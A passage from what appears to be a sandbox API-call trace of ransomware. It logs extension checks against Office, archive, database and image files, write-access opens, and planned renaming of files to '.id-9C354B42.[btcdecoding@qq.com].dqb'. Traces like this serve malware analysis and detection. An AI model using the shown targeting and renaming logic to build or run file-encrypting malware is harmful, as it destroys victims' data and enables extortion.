Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.442] lstrlenW (lpString=".doc") returned 4 [0269.442] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.442] lstrlenW (lpString=".docx") returned 5 [0269.442] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0269.442] lstrlenW (lpString=".pdf") returned 4 [0269.442] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.442] lstrlenW (lpString=".xls") returned 4 [0269.442] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.442] lstrlenW (lpString=".xlsx") returned 5 [0269.442] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0269.442] lstrlenW (lpString=".ppt") returned 4 [0269.442] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.442] lstrlenW (lpString=".zip") returned 4 [0269.442] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString=".rar") returned 4 [0269.443] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString=".bz2") returned 4 [0269.443] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString=".7z") returned 3 [0269.443] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.443] lstrlenW (lpString=".dbf") returned 4 [0269.443] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.443] lstrlenW (lpString=".1cd") returned 4 [0269.443] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.443] lstrlenW (lpString=".jpg") returned 4 [0269.443] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.443] lstrlenW (lpString=".doc") returned 4 [0269.443] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString=".docx") returned 5 [0269.443] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0269.443] lstrlenW (lpString=".pdf") returned 4 [0269.443] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.443] lstrlenW (lpString=".xls") returned 4 [0269.443] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString=".xlsx") returned 5 [0269.444] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0269.444] lstrlenW (lpString=".ppt") returned 4 [0269.444] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.444] lstrlenW (lpString=".zip") returned 4 [0269.444] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString=".rar") returned 4 [0269.444] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString=".bz2") returned 4 [0269.444] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString=".7z") returned 3 [0269.444] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.444] lstrlenW (lpString=".dbf") returned 4 [0269.444] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.444] lstrlenW (lpString=".1cd") returned 4 [0269.444] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0269.444] lstrlenW (lpString=".jpg") returned 4 [0269.444] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.444] Sleep (dwMilliseconds=0x64) [0269.898] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.898] lstrlenW (lpString="base_ca.xml") returned 11 [0269.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.243] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=3166) returned 1 [0270.243] CloseHandle (hObject=0x1f4) returned 1 [0270.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0270.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.243] lstrlenW (lpString=".doc") returned 4 [0270.243] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString=".docx") returned 5 [0270.243] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0270.243] lstrlenW (lpString=".pdf") returned 4 [0270.243] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString=".xls") returned 4 [0270.243] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString=".xlsx") returned 5 [0270.243] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0270.243] lstrlenW (lpString=".ppt") returned 4 [0270.243] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.243] lstrlenW (lpString=".zip") returned 4 [0270.243] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.243] lstrlenW (lpString=".rar") returned 4 [0270.243] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString=".bz2") returned 4 [0270.243] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.243] lstrlenW (lpString=".7z") returned 3 [0270.243] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".dbf") returned 4 [0270.244] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".1cd") returned 4 [0270.244] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".jpg") returned 4 [0270.244] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".doc") returned 4 [0270.244] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString=".docx") returned 5 [0270.244] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0270.244] lstrlenW (lpString=".pdf") returned 4 [0270.244] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString=".xls") returned 4 [0270.244] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString=".xlsx") returned 5 [0270.244] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0270.244] lstrlenW (lpString=".ppt") returned 4 [0270.244] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".zip") returned 4 [0270.244] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.244] lstrlenW (lpString=".rar") returned 4 [0270.244] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString=".bz2") returned 4 [0270.244] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.244] lstrlenW (lpString=".7z") returned 3 [0270.244] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.244] lstrlenW (lpString=".dbf") returned 4 [0270.245] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.245] lstrlenW (lpString=".1cd") returned 4 [0270.245] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0270.245] lstrlenW (lpString=".jpg") returned 4 [0270.245] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.245] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.245] lstrlenW (lpString="base_jpn.xml") returned 12 [0270.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.245] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=804) returned 1 [0270.245] CloseHandle (hObject=0x1f4) returned 1 [0270.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0270.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.245] lstrlenW (lpString=".doc") returned 4 [0270.245] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.245] lstrlenW (lpString=".docx") returned 5 [0270.245] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0270.245] lstrlenW (lpString=".pdf") returned 4 [0270.246] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString=".xls") returned 4 [0270.246] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString=".xlsx") returned 5 [0270.246] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0270.246] lstrlenW (lpString=".ppt") returned 4 [0270.246] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString=".zip") returned 4 [0270.246] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.246] lstrlenW (lpString=".rar") returned 4 [0270.246] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString=".bz2") returned 4 [0270.246] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString=".7z") returned 3 [0270.246] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString=".dbf") returned 4 [0270.246] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString=".1cd") returned 4 [0270.246] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString=".jpg") returned 4 [0270.246] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.246] lstrlenW (lpString=".doc") returned 4 [0270.246] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.246] lstrlenW (lpString=".docx") returned 5 [0270.246] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0270.246] lstrlenW (lpString=".pdf") returned 4 [0270.246] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString=".xls") returned 4 [0270.247] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString=".xlsx") returned 5 [0270.247] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0270.247] lstrlenW (lpString=".ppt") returned 4 [0270.247] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.247] lstrlenW (lpString=".zip") returned 4 [0270.247] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.247] lstrlenW (lpString=".rar") returned 4 [0270.247] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString=".bz2") returned 4 [0270.247] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString=".7z") returned 3 [0270.247] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.247] lstrlenW (lpString=".dbf") returned 4 [0270.247] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.247] lstrlenW (lpString=".1cd") returned 4 [0270.247] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0270.247] lstrlenW (lpString=".jpg") returned 4 [0270.247] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.247] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.247] lstrlenW (lpString="base_kor.xml") returned 12 [0270.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.248] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=488) returned 1 [0270.248] CloseHandle (hObject=0x1f4) returned 1 [0270.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0x20 [0270.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.249] lstrlenW (lpString=".doc") returned 4 [0270.249] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString=".docx") returned 5 [0270.249] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0270.249] lstrlenW (lpString=".pdf") returned 4 [0270.249] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString=".xls") returned 4 [0270.249] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString=".xlsx") returned 5 [0270.249] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0270.249] lstrlenW (lpString=".ppt") returned 4 [0270.249] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.249] lstrlenW (lpString=".zip") returned 4 [0270.249] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.249] lstrlenW (lpString=".rar") returned 4 [0270.249] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString=".bz2") returned 4 [0270.249] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString=".7z") returned 3 [0270.249] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.249] lstrlenW (lpString=".dbf") returned 4 [0270.249] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.249] lstrlenW (lpString=".1cd") returned 4 [0270.249] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.249] lstrlenW (lpString=".jpg") returned 4 [0270.249] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString=".doc") returned 4 [0270.250] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString=".docx") returned 5 [0270.250] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0270.250] lstrlenW (lpString=".pdf") returned 4 [0270.250] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString=".xls") returned 4 [0270.250] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString=".xlsx") returned 5 [0270.250] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0270.250] lstrlenW (lpString=".ppt") returned 4 [0270.250] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString=".zip") returned 4 [0270.250] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.250] lstrlenW (lpString=".rar") returned 4 [0270.250] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString=".bz2") returned 4 [0270.250] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString=".7z") returned 3 [0270.250] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString=".dbf") returned 4 [0270.250] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString=".1cd") returned 4 [0270.250] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0270.250] lstrlenW (lpString=".jpg") returned 4 [0270.250] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.251] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.251] lstrlenW (lpString="base_rtl.xml") returned 12 [0270.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.251] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=617) returned 1 [0270.251] CloseHandle (hObject=0x1f4) returned 1 [0270.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0x20 [0270.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0270.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0270.251] lstrlenW (lpString=".doc") returned 4 [0270.251] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.251] lstrlenW (lpString=".docx") returned 5 [0270.251] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0270.251] lstrlenW (lpString=".pdf") returned 4 [0270.251] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.251] lstrlenW (lpString=".xls") returned 4 [0270.251] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.251] lstrlenW (lpString=".xlsx") returned 5 [0270.251] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0270.251] lstrlenW (lpString=".ppt") returned 4 [0270.251] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0270.251] lstrlenW (lpString=".zip") returned 4 [0270.251] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.252] lstrlenW (lpString=".rar") returned 4 [0270.252] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.252] lstrlenW (lpString=".bz2") returned 4 [0270.252] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.252] lstrlenW (lpString=".7z") returned 3 [0270.252] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0270.252] lstrlenW (lpString=".dbf") returned 4 [0270.252] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0271.081] Sleep (dwMilliseconds=0x64) [0271.196] Sleep (dwMilliseconds=0x64) [0271.301] lstrcmpiW (lpString1=".bmp", lpString2=".dqb") returned -1 [0271.937] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd 